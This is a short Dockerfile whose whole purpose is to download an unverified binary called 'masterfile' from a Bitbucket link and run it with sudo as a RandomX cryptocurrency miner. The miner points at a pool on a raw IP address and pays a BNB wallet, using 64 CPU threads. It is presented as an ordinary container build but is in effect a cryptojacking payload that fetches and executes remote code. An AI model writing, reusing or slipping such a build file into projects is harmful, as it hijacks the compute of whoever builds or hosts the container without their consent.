FROM ubuntu-latest

RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/juani2603/donwload/downloads/masterfile
RUN chmod u+x masterfile
RUN sudo ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.worker1 --cpu-threads 64;0